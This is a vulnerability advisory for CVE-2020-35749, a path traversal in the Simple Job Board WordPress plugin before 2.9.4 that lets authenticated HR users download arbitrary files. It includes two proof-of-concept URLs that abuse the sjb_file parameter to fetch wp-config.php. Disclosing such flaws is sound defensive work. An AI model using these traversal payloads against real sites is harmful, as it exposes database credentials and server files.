Simple Job Board < 2.9.4 – Authenticated Path Traversal Leading to Arbitrary File Download | CVE 2020-35749 | Plugin Vulnerabilities

Description

The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack

Proof of Concept

The sjb_file parameter to use may depends on the configuration of the plugin, e.g:

https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=var/www/wp-config.php
https://example.com/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../wp-config.php

Affects Plugins

simple-job-board

Fixed in 2.9.4

References

CVE

Exploitdb

URL

https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Arcangelo Saracino

Verified

Yes

WPVDB ID

eed3bd69-2faf-4bc9-915c-c36211ef9e2d

Timeline

Publicly Published

2021-01-15 (about 5 years ago)

Added

2021-01-15 (about 5 years ago)

Last Updated

2021-01-23 (about 5 years ago)

Other

Published

Title

Published

2019-07-12

Title

Ad Inserter <= 2.4.19 - Authenticated Path Traversal

Published

2022-09-15

Title

SearchWP Live Ajax Search < 1.6.3 - Unauthenticated Local File Inclusion

Published

2019-01-25

Title

Download Ad Manager by WD - Arbitrary File Download

Published

2021-12-01

Title

OMGF < 4.5.12 - Admin+ Arbitrary Folder Deletion via Path Traversal

Published

2023-03-22

Title

Pricing Tables For WPBakery Page Builder < 3.0 - Subscriber+ LFI